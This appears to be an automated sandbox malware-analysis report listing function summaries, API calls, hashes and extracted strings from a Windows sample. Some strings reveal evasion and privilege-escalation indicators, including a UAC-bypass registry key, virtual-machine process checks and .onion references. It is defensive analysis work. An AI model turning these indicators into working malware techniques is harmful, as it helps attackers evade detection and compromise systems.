Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e4b8d18ac1d5b823cb758d4da557d8c3d11d1c86cbc39721e7f030f5ffbac894
Instruction ID: 253e0b0f263c16fdf6b4621e5ef83b69a379a7f5ae9756f21036c37153ea9268
Opcode Fuzzy Hash: e4b8d18ac1d5b823cb758d4da557d8c3d11d1c86cbc39721e7f030f5ffbac894
Instruction Fuzzy Hash: C7F0C232A00200DADA30BBA59902B0A32A09B00718F6041BFE8647AAD3CB3C19059A8D

Uniqueness

Uniqueness Score: -1.00%

Function 00406890 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

std::_Mutex::_Mutex.LIBCPMT ref: 004068B5

Part of subcall function 004084E8: _malloc.LIBCMT ref: 00408502

std::locale::_Init.LIBCPMT ref: 004068D3

Part of subcall function 004073C9: __EH_prolog3.LIBCMT ref: 004073D0
Part of subcall function 004073C9: std::_Lockit::_Lockit.LIBCPMT ref: 004073E6
Part of subcall function 004073C9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00407408
Part of subcall function 004073C9: std::locale::_Setgloballocale.LIBCPMT ref: 00407412
Part of subcall function 004073C9: _Yarn.LIBCPMT ref: 00407428

std::_Lockit::_Lockit.LIBCPMT ref: 004068E7

Strings

g@, xrefs: 004068AF

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: std::_std::locale::_$LockitLockit::_$H_prolog3InitLocimpLocimp::_MutexMutex::_SetgloballocaleYarn_malloc
String ID: g@
API String ID: 3906141431-2607555330
Opcode ID: 1abd1b4e7eba0135796e840aa50c82df7ad48c891239ac4ca8817af78c6e9032
Instruction ID: 7ceeaa654e45a334c5391fbf28852b0e3a5145a0fd936960374e69fc9abcb302
Opcode Fuzzy Hash: 1abd1b4e7eba0135796e840aa50c82df7ad48c891239ac4ca8817af78c6e9032
Instruction Fuzzy Hash: 1821F2B5500B00CFD321CF25C590B92BBE0FB98720F108A2EE8969BB91E779B404CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041479E Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004147D2
__isleadbyte_l.LIBCMT ref: 00414805
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00414836
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 004148A4

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 07965dacb2f652a297d31451b644f006057e2d3b909b5f31364106603b0c3b74
Instruction ID: 94b53389475df4d17abfd998a0c6392ea7761b49d1174936c9a295e363a53524
Opcode Fuzzy Hash: 07965dacb2f652a297d31451b644f006057e2d3b909b5f31364106603b0c3b74
Instruction Fuzzy Hash: C531E735A00296EFCB20EF64C8809FE3BA5AF82321F15466AE4759B2D1D334DD81DB55

Uniqueness

Uniqueness Score: -1.00%

Function 004145A8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004145CE

Part of subcall function 004143FA: __fltout2.LIBCMT ref: 00414425

__cftog_l.LIBCMT ref: 004145F4
__cftoe_l.LIBCMT ref: 00414626

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 37b179b09a40a7a32c929a25efee952e0e3e6cbff0d209da516ced7062632b20
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 0E11723200014ABBCF165E84CC01CEE3F23BB99355B588416FE1859130C73ACAB2AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00406EBD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00406ED9

Part of subcall function 00407822: std::exception::exception.LIBCMT ref: 00407837
Part of subcall function 00407822: __CxxThrowException@8.LIBCMT ref: 0040784C
Part of subcall function 00407822: std::exception::exception.LIBCMT ref: 0040785D

Part of subcall function 00406E57: std::_Xinvalid_argument.LIBCPMT ref: 00406E6A

_memmove.LIBCMT ref: 00406F34

Strings

invalid string position, xrefs: 00406ED4

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: cc2736de256daf0ba70b4c5e86a3b15cbc0c876003f789ff18af896096f7ad22
Instruction ID: d4069e6bb8da39e2fd52404a3e7fab7274e0f592410543c3f6a32a5c81d0a90a
Opcode Fuzzy Hash: cc2736de256daf0ba70b4c5e86a3b15cbc0c876003f789ff18af896096f7ad22
Instruction Fuzzy Hash: 5711C8313042129BDB24DE19E940A2AB7A9EB81714B12053FF857AB2C6CB75D921C79D

Uniqueness

Uniqueness Score: -1.00%

Function 00406CB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00406CCC

Part of subcall function 00407822: std::exception::exception.LIBCMT ref: 00407837
Part of subcall function 00407822: __CxxThrowException@8.LIBCMT ref: 0040784C
Part of subcall function 00407822: std::exception::exception.LIBCMT ref: 0040785D

_memmove.LIBCMT ref: 00406D05

Strings

invalid string position, xrefs: 00406CC7

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: e6fc2e2e76330155c899dedf3742fd61ac248dab533920c8b5ac60506055a239
Instruction ID: 65e3c1a85f650d3d563dfa77f95bb3982296cf530b7e8f25a001815a5e4149ab
Opcode Fuzzy Hash: e6fc2e2e76330155c899dedf3742fd61ac248dab533920c8b5ac60506055a239
Instruction Fuzzy Hash: 3C01F5313042554BE3248E6CD98482BB7B6EB81710726493EE4C397685DB78EC5693A8

Uniqueness

Uniqueness Score: -1.00%

Function 00406740 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004067A2

Part of subcall function 004070BE: std::ios_base::_Tidy.LIBCPMT ref: 004070DF

Strings

f@, xrefs: 00406793
@g@, xrefs: 0040676B

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: std::ios_base::_$Ios_base_dtorTidy
String ID: @g@$f@
API String ID: 3167631304-1575707234
Opcode ID: 0caa7ebb214026749c5ce707cff4397635f526cab827a6beb22221b40362136a
Instruction ID: bdfc71dde26310aeaefbc04d77f2997331ad58e69e976bcebad799d3ec7d809e
Opcode Fuzzy Hash: 0caa7ebb214026749c5ce707cff4397635f526cab827a6beb22221b40362136a
Instruction Fuzzy Hash: 560192B12043809FC304DF08C884B5AFBF9FB95324F144A6EE556A73D1D3B9A949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00408EAF: __getptd.LIBCMT ref: 00408EB5
Part of subcall function 00408EAF: __getptd.LIBCMT ref: 00408EC5

__getptd.LIBCMT ref: 0040D1B3

Part of subcall function 0040C200: __getptd_noexit.LIBCMT ref: 0040C203
Part of subcall function 0040C200: __amsg_exit.LIBCMT ref: 0040C210

__getptd.LIBCMT ref: 0040D1C1

Strings

csm, xrefs: 0040D1CF

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 6582aeb12a32776248adb9f36ecbbea4aad84ef7a4c0a8635431c8a010ec0117
Instruction ID: 2b9f3626bb52547a8883bb3a8012880e400823eb3a29ee6a5b9e7fba5d2ec7e3
Opcode Fuzzy Hash: 6582aeb12a32776248adb9f36ecbbea4aad84ef7a4c0a8635431c8a010ec0117
Instruction Fuzzy Hash: 30017C38C00204CADF249FE1C45066EB3B5AF68315F64867FE450B66D1CB38C989CE99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B807 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,0040B840,00000000,00000000,00000000,00000000,00000000,00412818,?,0040AF45,00000003,00407FB5,00000001,00000000,00000000), ref: 0040B812
__invoke_watson.LIBCMT ref: 0040B82E

Strings

PN7w, xrefs: 0040B812

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: PN7w
API String ID: 4034010525-3458938079
Opcode ID: c1c3af4b505b0c28a499b83dd08b1f7b0961cb9cad86ed7882e9fd5e4c2edc04
Instruction ID: 95320dc498d7f7e39fb0afc9680b164e62fed2c37706a4331ee8afaa103fd7c5
Opcode Fuzzy Hash: c1c3af4b505b0c28a499b83dd08b1f7b0961cb9cad86ed7882e9fd5e4c2edc04
Instruction Fuzzy Hash: E4E0B672100149AFCF012FA1DD058AA3A6AEF84750B548475FE1492171D736D8309A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00405C19

Part of subcall function 00407DF8: std::exception::operator=.LIBCMT ref: 00407E11

Strings

PZ@, xrefs: 00405C1E
PZ@, xrefs: 00405C31

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: std::exception::exceptionstd::exception::operator=
String ID: PZ@$PZ@
API String ID: 1598257956-1044096902
Opcode ID: fbf2c552a1e91c7964ea84d9b70704789819460854b60cf5c869f3b7a3e84cb5
Instruction ID: 37a122b39f73fe7cd3bb4d43aa29c6fbc1607298c9878d38a603e8f6bb2784a2
Opcode Fuzzy Hash: fbf2c552a1e91c7964ea84d9b70704789819460854b60cf5c869f3b7a3e84cb5
Instruction Fuzzy Hash: F8D0E2B26087119BC3249F2A940084AFBF8FF95320302892FA1A8A3740C3B4A841CB98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: e0cbefcb1af40c7d4aff4aca26621a98.exePID: 3392, Parent PID: 5776COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	1

Executed Functions

Function 02B6B7C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02B6B7EE
Module32First.KERNEL32(00000000,00000224), ref: 02B6B80E

Memory Dump Source

Source File: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2b6b000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 671b5b03821641faebe1e6f69aa4a5047bbd71b2e366a6b5f1ef13c977371326
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 24F096312007116FD7203BF5A88DB7E76F8EF4976DF100568E643E24C0DB74E8458A61

Uniqueness

Uniqueness Score: -1.00%

Function 02B6B485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02B6B4D6

Memory Dump Source

Source File: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2b6b000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 3eafd3fda222438bd7c6a6074a71660ced02325cd344f86ea4a24d00a0618f13
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: CC113F79A00208EFDB01DF98C995E99BBF5EF08350F058094F948AB361D375EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00433840 Relevance: 12.7, Strings: 10, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
%, xrefs: 00433B64
CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B

Memory Dump Source

Source File: 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.4559431109.0000000000840000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000C77000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000C7A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000CCF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000CD3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000CEF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000CF6000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd

Yara matches

Similarity

API ID:
String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
API String ID: 0-2845907608
Opcode ID: 4ee474e8321923de33487fdd75fee96f24fc28db05651af307a526fdfd105d7c
Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
Opcode Fuzzy Hash: 4ee474e8321923de33487fdd75fee96f24fc28db05651af307a526fdfd105d7c
Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00443890 Relevance: 5.1, Strings: 4, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1

Memory Dump Source

Source File: 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.4559431109.0000000000840000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000C77000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000C7A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000CCF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000CD3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000CEF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.4559431109.0000000000CF6000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd

Yara matches

Similarity

API ID:
String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort 